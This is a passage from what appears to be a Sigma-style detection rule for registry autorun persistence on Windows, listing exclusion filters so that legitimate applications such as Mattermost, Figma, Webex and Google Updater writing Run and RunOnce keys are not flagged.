'*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CapsLock Indicator'\n\n exclusion_citrix_ica_client:\n Image|endswith: '\\Windows\\System32\\msiexec.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ConnectionCenter'\n Details|endswith: 'concentr.exe\" /startup'\n\n exclusion_clickshare:\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ClickShare'\n Details|contains: '\\AppData\\Local\\ClickShare\\ClickShare.exe'\n\n exclusion_gosign_desktop:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\\\*\\AppData\\Local\\InfoCert\\GoSign Desktop\\GoSignDesktop.exe'\n Details|contains: '*\\AppData\\Local\\InfoCert\\GoSign Desktop\\GoSignDesktop.exe'\n\n exclusion_bingwallpaperapp:\n Image: '?:\\Windows\\System32\\msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n Details: '*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe'\n\n exclusion_mattermost_reg:\n Image: '?:\\Windows\\System32\\reg.exe'\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mattermost'\n Details: '*\\AppData\\Local\\Programs\\mattermost-desktop\\Mattermost.exe*'\n\n exclusion_loom:\n Image|endswith: 'AppData\\Local\\Programs\\Loom\\Loom.exe'\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\electron.app.Loom'\n Details: '*\\AppData\\Local\\Programs\\Loom\\Loom.exe*'\n\n exclusion_letsignit:\n Image:\n - '?:\\Windows\\System32\\reg.exe'\n - '?:\\Windows\\SysWOW64\\reg.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Letsignit App'\n Details:\n - '*\\AppData\\Local\\LetsignitApp\\update.exe*'\n - '*\\AppData\\Local\\Microsoft\\LetsignitApp\\update.exe*'\n - '*\\AppData\\Local\\LetsignitApp\\app-?.?.?\\Letsignit App.exe*'\n\n exclusion_letsignit2:\n ProcessParentDescription: 'Letsignit App'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Letsignit SAS'\n\n exclusion_setuphost:\n # C:\\$WINDOWS.~BT\\Sources\\setuphost.exe\n Image: '?:\\\\?WINDOWS.?BT\\Sources\\setuphost.exe'\n # C:\\Windows\\SoftwareDistribution\\Download\\065fd01c95189f768f95256d0434663a\\WindowsUpdateBox.exe\n ProcessParentImage: '*\\sources\\setupprep.exe'\n\n exclusion_realtek:\n Image|endswith: '\\Setup.exe'\n TargetObject|endswith: '\\RunOnce\\RealtekHDAUpgrade'\n Details: 'RealtekHDAUpgrade'\n ProcessCommandLine|contains|all:\n - ' -no_selfdeleter -IS_temp -media_path:'\n - ' -tempdisk1folder:'\n - ' -IS_OriginalLauncher:'\n\n exclusion_dashlane:\n Image|endswith: '\\DashlaneInstaller.exe'\n ProcessParentImage|endswith: '\\AppData\\Roaming\\Dashlane\\Dashlane.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DashlanePlugin'\n\n exclusion_figma:\n Image|endswith: '\\AppData\\Local\\FigmaAgent\\figma_agent.exe'\n Details|endswith:\n - '\\AppData\\Local\\FigmaAgent\\figma_agent.exe'\n - '\\AppData\\Local\\FigmaAgent\\figma_agent.exe\"'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Figma Agent'\n\n exclusion_move_mouse:\n Image|endswith: '\\move mouse.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\move mouse'\n\n exclusion_aventail:\n Image|endswith: '\\appdata\\roaming\\aventail\\ewpca\\ewpca.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\betproxy'\n\n exclusion_kaijet_wormhole:\n Image: '*\\appdata\\roaming\\kaijet\\wormhole1107\\functmodules\\\\?92eedb7d-755a-4a90-a79d-c0bd0acf1a7f?\\wormhole.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\cs dispatch'\n\n exclusion_cacaoweb:\n Image|endswith: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe'\n ProcessSignature: 'CACAOWEB Ltd'\n Details|contains: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe'\n\n exclusion_atlassian:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.atlassian-desktop-companion.AtlassianCompanion'\n # C:\\Users\\XXX\\AppData\\Local\\atlassian-desktop-companion\\app-1.3.1\\Atlassian Companion.exe\n Image|endswith: '\\Atlassian Companion.exe'\n\n exclusion_att_meetings:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.att.meetings'\n Details|contains: 'appdata\\local\\programs\\officeathandmeetings\\at&t office@hand meetings.exe'\n\n exclusion_sigilium:\n Image: '?:\\Windows\\System32\\reg.exe'\n ProcessParentImage|endswith: '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Sigilium Email Signatures'\n Details|contains: '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n\n exclusion_lenovo_winsat:\n Image|endswith:\n - '\\igxpin.exe'\n - '\\Setup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WinSat'\n Details: 'winsat dwm -xml results.xml'\n\n exclusion_medefaultpcreset:\n Image|endswith: '\\MEDefaultPCReset.exe'\n ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!MEDefaultPCReset'\n Details|contains: '\\AppData\\Local\\Microsoft\\BingWallpaperApp\\MEDefaultPCReset.exe'\n\n exclusion_ms_default_setup:\n Details|endswith: '\\AppData\\Local\\Microsoft\\DefaultSetup\\DefaultSetup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!DefaultSetup'\n\n exclusion_osk:\n Image: '?:\\Windows\\System32\\osk.exe'\n ProcessSignature: 'Microsoft Windows'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\osk.exe'\n Details: 'osk.exe'\n\n exclusion_windows10upgrade:\n Image: '?:\\Windows10Upgrade\\Windows10UpgraderApp.exe'\n ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!GetCurrentRollback'\n Details|contains: '?:\\Windows10Upgrade\\GetCurrentRollback.exe'\n\n exclusion_1clipboard:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\1Clipboard'\n Details: '*\\AppData\\Local\\1Clipboard\\\\*\\1Clipboard.exe*'\n\n exclusion_lifesize_reg:\n # C:\\Windows\\system32\\reg.exe ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Lifesize App Service /t REG_SZ /d \"C:\\Users\\xxxxx\\AppData\\Local\\lifesize_app\\Lifesize App Service.exe\" --path=\"C:\\Users\\xxxxxxx\\AppData\\Local\\lifesize_app\\Lifesize.exe\" --silent /f\n # details : \"C:\\Users\\xxxxxx\\AppData\\Local\\lifesize_app\\Lifesize App Service.exe\" --path=\"C:\\Users\\xxxxxx\\AppData\\Local\\lifesize_app\\Lifesize.exe\" --silent\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Lifesize App Service'\n Details|contains|all:\n - '\\lifesize_app\\Lifesize App Service.exe'\n - '\\lifesize_app\\Lifesize.exe'\n - ' --silent'\n\n exclusion_lifesize:\n # details : C:\\Users\\xxxxx\\AppData\\Local\\lifesize_app\\update.exe --processStart \"Lifesize.exe\" --process-start-args \"--hidden\"\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifesize_app.Lifesize'\n Details|contains|all:\n - '\\lifesize_app\\update.exe'\n - ' --process-start-args'\n - 'Lifesize.exe'\n\n exclusion_yammer:\n # details: \"C:\\Users\\xxxxxx\\AppData\\Local\\yammerdesktop\\update.exe\" --processStart \"Yammer.exe\"\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Yammer'\n Details|contains|all:\n - '\\AppData\\Local\\yammerdesktop\\update.exe'\n - 'Yammer.exe'\n\n exclusion_genuine:\n Image|endswith: '\\msiexec.exe'\n TargetObject|endswith:\n - '\\Microsoft\\Windows\\CurrentVersion\\Run\\Autodesk Genuine Service'\n - '\\Microsoft\\Windows\\CurrentVersion\\Run\\Autodesk Genuine Service ' # Space at the end\n Details:\n - '*\\Autodesk\\Genuine Service\\x64\\GenuineService.exe'\n - '%localappdata%\\Programs\\Autodesk\\Genuine Service\\GenuineService.exe'\n\n exclusion_wirelesssetup:\n Image: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\WirelessSetup.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SWComponent'\n # \"C:\\windows\\Temp\\{2F3CA705-308B-42B2-9781-7CEBF8E1F5F2}\\.cr\\WirelessSetup.exe\" -s\n Details|contains: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\WirelessSetup.exe'\n\n exclusion_seagull1:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Seagull Drivers'\n Details: 'ssdal_nc.exe startup'\n\n exclusion_marche_public:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Mon Assistant Marchés Publics'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mon Assistant Marchés Publics ECOLE'\n Details|contains:\n - '\\mon-assistant-marche-public\\Mon Assistant Marchés Publics.exe'\n - '\\mon-assistant-marche-public-ecole\\Mon Assistant Marchés Publics ECOLE.exe'\n\n exclusion_sepprep:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\\\?' # HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\1\n Details: 'SEPprep64.exe'\n\n exclusion_webex1:\n Image|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoMeetingDaemon'\n Details|contains: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n\n exclusion_rambox:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Rambox'\n # C:\\Users\\xxxxxx\\Documents\\Rambox\\Rambox-0.7.9-win-x64\\Rambox.exe / \"C:\\Users\\xxxx W\\AppData\\Local\\Programs\\Rambox\\Rambox.exe\"\n Details|contains: '\\Rambox*Rambox.exe' # in appdata or in another directory\n\n exclusion_mattermost_exe:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mattermost'\n Details|contains: '\\appdata\\local\\programs\\mattermost-desktop\\mattermost.exe'\n\n exclusion_signitic:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Signitic'\n Details|contains: '\\Signitic\\Signitic.exe'\n\n exclusion_soti_remote_control:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SOTI Remote Control Service'\n Details|endswith: '\\AppData\\Local\\Apps\\SOTI Remote Control\\SotiRemoteControlLauncher.exe'\n\n exclusion_breitling_ewarranty:\n Image|endswith: '\\BreitlingEWarranty.exe'\n Details|endswith: '\\BreitlingEWarranty.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BreitlingEWarranty'\n\n exclusion_rainbow:\n # also seen : D:\\Profils\\xxx\\AppData\\Local\\Temp\\574\\is-A8ASG.tmp\\Rainbow_Installer.tmp\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\is-L6M7V.tmp\\Rainbow_Installer (3).tmp\n Image|contains:\n - '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n - '\\Rainbow_Installer.tmp'\n - '\\Rainbow_Installer (?).tmp'\n Details|contains: '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Rainbow'\n\n exclusion_mwsnap:\n # http://www.mirekw.com/winfreeware/index.html\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mwsnap'\n Details|contains:\n - '\\mwsnap\\mwsnap.exe'\n - '\\mwsnapportable\\mwsnap.exe'\n\n exclusion_infapp:\n # Intel(R) Wireless Connectivity Solutions\n Image: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\Setup.exe'\n Details: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\Setup.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SWComponent'\n\n exclusion_streamci:\n # rundll32.exe streamci,StreamingDeviceSetup {cfd669f1-9bc2-11d0-8299-0000f822fe8a},{0A4252A0-7E70-11D0-A5D6-28DB04C10000},{0A4252A0-7E70-11D0-A5D6-28DB04C10000},C:\\Windows\\inf\\ksfilter.inf,MSTEE.Interface.Install\n Details|startswith: 'rundll32.exe streamci,StreamingDeviceSetup '\n Image: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_logibolt:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\LogiBolt'\n Image: '*\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe'\n Details|endswith: '\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe --startup'\n\n exclusion_clavier:\n Details: '*\\AppData\\Local\\Clavier?\\Clavier.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Clavier?'\n\n exclusion_grammarly:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Grammarly'\n Details: '*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe'\n\n exclusion_screenpresso:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Screenpresso'\n Details|contains: '\\AppData\\Local\\Learnpulse\\Screenpresso\\Screenpresso.exe'\n\n exclusion_authenticator:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Authenticator 6'\n Details|contains: '\\authenticator6\\Authenticator 6.exe' # \\AppData\\Local\\Programs\\authenticator6\\.. or c:\\authenticator6\\..\n\n exclusion_bomgar_scc:\n # HKU\\S-1-5-21-xxxx\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_ZD157689015613218\n # HKU\\S-1-5-21-xxxx\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar Support Reconnect [624BEF75]\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar Support Reconnect '\n # details :\n # cmd.exe /C rd /S /Q \"C:\\Users\\xxxx\\AppData\\Local\\Temp\\3\\nsf89E7.tmpb\" & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD355897154620360 /f\n # cmd.exe /C rd /S /Q \"d:\\profils\\xxxxr\\AppData\\Local\\Temp\\200\\nse99F8.tmpb\" & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD71241960920524 /f\n # \"?:\\ProgramData\\bomgar-scc-0x6242b8b7\\bomgar-scc.exe\" -nomulti\n Details|contains:\n - '\\bomgar-scc.exe'\n - 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD'\n\n exclusion_autodesk_fusion_launcher:\n # cmd /C copy /Y \"C:\\Users\\xxx\\AppData\\Local\\Autodesk\\webdeploy\\production\\19107935ce2ad08720646cb4a31efe37d8a5f41b\\FusionLauncher.exe\" \"C:\\Users\\xxxx\\AppData\\Local\\Autodesk\\webdeploy\\production\\6a0c9611291d45bb9226980209917c3d\\FusionLauncher.exe\"\n Details: 'cmd /C copy /Y *\\AppData\\Local\\Autodesk\\webdeploy\\production*FusionLauncher.exe*'\n\n exclusion_update_checker:\n # details: C:\\Users\\xxxx\\AppData\\Local\\Apps\\2.0\\AAOL97KH.5T2\\EYW08NNP.BG0\\upda..tion_d618ae9fc43a22ce_0001.0000_bb623013ee6c2931\\Update Checker.exe\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update Checker'\n Details|endswith: '\\Update Checker.exe'\n\n exclusion_enhanced_edge:\n TargetObject:\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!MEDefaultPCReset'\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!BrowserSettingsInstaller'\n Details|contains:\n - '*\\AppData\\Local\\Microsoft\\EnhanceEdge\\MEDefaultPCReset.exe'\n - '*\\AppData\\Local\\Microsoft\\EnhanceEdge\\BrowserSettingsInstaller.exe'\n\n exclusion_adobe_connectdetector:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n Details|contains: 'AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe'\n\n exclusion_samsung:\n Image: '?:\\Windows\\Samsung\\PanelMgr\\SSMMgr.exe'\n Details: '?:\\Windows\\Samsung\\PanelMgr\\SSMMgr.exe /autorun'\n TargetObject: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Samsung PanelMgr'\n\n exclusion_dell_dbrm_tray:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DBRMTray'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\DBRMTray'\n Details|contains:\n - '\\DBRM\\Reminder\\TrayApp.exe'\n - '\\DBRM\\Reminder\\DbrmTrayIcon.exe'\n\n exclusion_rnp_panel_manager:\n TargetObject:\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\RNP PanelMgr'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RNP PanelMgr'\n Details|contains: '?:\\windows\\RNP\\PanelMgr\\SSMMgr.exe'\n\n exclusion_bing_svc:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BingSvc'\n Details|contains: '\\AppData\\Local\\Microsoft\\BingSvc\\BingSvc.exe'\n\n exclusion_bing_service:\n Image: '?:\\Windows\\Temp\\MUBSTemp\\BGAStartMSILauncher.EXE'\n ProcessSignature: 'Microsoft Corporation'\n Details|contains: '?:\\Windows\\Temp\\MUBSTemp\\BGAStartMSI.EXE'\n\n exclusion_eolis:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPS Setup Restart'\n Details|contains|all:\n - '\\Evolis\\Setup_Evolis_Premium_Suite.exe'\n - '?:\\ProgramData\\Evolis Premium SuiteRst\\param.dat'\n\n exclusion_signalrgb:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SignalRgb'\n Details|contains|all:\n - '?:\\Users\\\\*\\AppData\\Local\\VortxEngine\\SignalRgbLauncher.exe'\n - '--silent'\n\n exclusion_zamzar:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Zamzar.Zamzar'\n Details: '?:\\Users\\\\*\\AppData\\Local\\Zamzar\\app-*\\Zamzar.exe'\n\n exclusion_lifen:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen'\n Details|endswith: '\\Update.exe --processStart ?Lifen.exe? --process-start-args ?--hidden?'\n\n exclusion_typingmaster:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\TypingMaster*\\QuickPhrase\\qphrase.exe'\n Details|contains: '?:\\Users\\\\*\\AppData\\Local\\Programs\\TypingMaster*\\QuickPhrase\\qphrase.exe\"'\n\n exclusion_varian:\n ProcessImage: '?:\\ProgramData\\VDT.exe'\n ProcessOriginalFileName: 'VarianDeploymentTool.exe'\n Details: 'cmd /c \"start /d \"?:\\ProgramData\" VDT.exe /STOREPATH:\"?:\\ProgramData\\RSDInstaller\" /RESUME\"'\n\n exclusion_polylens:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n Details|startswith: '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_modjo:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Modjo_Taking-Note\\\\*\\modjo-livenotes.exe'\n Details|contains: '?:\\Users\\\\*\\AppData\\Local\\Modjo_Taking-Note\\Update.exe --processStart \"modjo-livenotes.exe\" --process-start-args \"--hidden\"'\n\n exclusion_actisync:\n Details|contains: 'AppData\\Local\\ActiGraph\\ActiSync\\ActiSync.exe'\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ActiSync'\n\n exclusion_keyacc32:\n TargetObject|endswith: 'Microsoft\\Windows\\CurrentVersion\\Run\\KeyAccess'\n Details: 'kass.exe'\n ProcessImage: '?:\\Windows\\keyacc32.exe'\n\n exclusion_smallpdf:\n TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Smallpdf.Smallpdf'\n Details|contains: 'AppData\\Local\\Smallpdf\\Smallpdf.exe'\n\n exclusion_windowsmobile:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '%windir%\\WindowsMobile\\wmdc.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Mobile Device Center'\n\n exclusion_googleupdater:\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\Google12936_775496257\\bin\\updater.exe\n ProcessImage|endswith: '\\updater.exe'\n ProcessSignature: 'Google LLC'\n Details: '*\\AppData\\Local\\Google\\GoogleUpdater\\\\*\\updater.exe*'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleUpdaterTaskUser*'\n\n exclusion_ghosts:\n Image|endswith: '\\ghosts.exe'\n ProcessDescription: 'GHOSTS NPC Orchestrator'\n\n exclusion_launcher_easy:\n Image|endswith: '\\LAUNCHEREASY.EXE'\n ProcessSignature: 'GINKOIA SAS'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\Launch_Replication'\n\n exclusion_msteams_uninstall:\n Image|endswith:\n - '\\msteams.exe'\n - '\\ms-teamsupdate.exe'\n ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\UninstallT??'\n\n exclusion_bluestacks:\n Image|endswith: '\\BlueStacksServices.exe'\n ProcessSignature: 'Now.gg, INC'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\electron.app.BlueStacks Services'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n\n exclusion_installer:\n ProcessCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* SetupGen!CustomActions.AfterInstall'\n - 'rundll32.exe ?:\\windows\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* CustomActions!CustomActions.CustomActions.KillProcess'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* CustomAction1!CustomAction1.CustomActions.UninstallMiniFilterDriver'\n\n exclusion_legitimate_applications:\n - Details: 'Binary Data'\n TargetObject: 'HKLM\\Software\\microsoft\\appv\\client\\packages\\6b2efa10-7858-47e5-8d4b-f23e603cdd38\\versions\\65d45509-5367-416a-af65-17de8a726c38\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\run\\sunjavaupdatesched'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\appv\\client\\packages\\\\*\\versions\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\adobeupdater\\(default)'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\run\\sunjavaupdatesched'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\software\\microsoft\\appv\\client\\packagegroups\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\microsoftedgeautolaunch_*'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\software\\microsoft\\appv\\client\\packages\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\microsoftedgeautolaunch_*'\n - Details: 'cmd /c if /i not %username%==sbsadmin start ?:\\\"program files\"\\illumina\\\"miniseq control software\"\\startcontrolsoftware.bat'\n TargetObject: 'hku\\.default\\Software\\Microsoft\\Windows\\currentversion\\group policy objects\\{*}machine\\Software\\Microsoft\\Windows\\currentversion\\policies\\explorer\\run\\1'\n - Details: '\"?:\\ProgramData\\akio\\tws_client\\current\\tws.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\twsv5'\n - Details: '\"?:\\ProgramData\\akio\\tws_client_tws_akio_cloud\\current\\tws.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\twsv5'\n - Details: '\"?:\\ProgramData\\comms\\pcmanager\\driverupgrade\\update\\downloaded\\\\*\\pcmanager_setup_*.exe\"'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\pcmanagersetup'\n - Details: '\"?:\\ProgramData\\microsoft\\windows\\start menu\\programs\\citrix\\receiver updater.lnk\"'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\citrixreceiver'\n - Details: '?:\\ProgramData\\tracker software\\trackerupdate\\trackerupdate.exe -startinstall'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\trackerupdate'\n - Details: '\"?:\\ProgramData\\wargaming.net\\gamecenter\\wgc.exe\" --background'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wargaming.net game center'\n - Details: '\"?:\\sources\\stockage\\keypirinha\\keypirinha.exe\" --autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\keypirinha'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\adista\\prod-*\\myistraadista\\myistraadista.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistraadista'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\apps\\\\*\\avmautostart.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avmusbfernanschluss'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\aver\\aver ptzapp\\aver ptzapp\\ecam.exe -background'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ptzapp'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\avg\\browser\\application\\avgbrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avgbrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\avira\\browser\\application\\avirabrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avirabrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\btblue\\molene-bretagne\\myistrabtblue\\myistrabtblue.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistrabtblue'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\ccleaner browser\\application\\ccleanerbrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ccleanerbrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\clavier+\\clavier.exe\" /launch'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\clavier+'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\cliq\\update.exe --processstart \"cliq.exe\"'\n 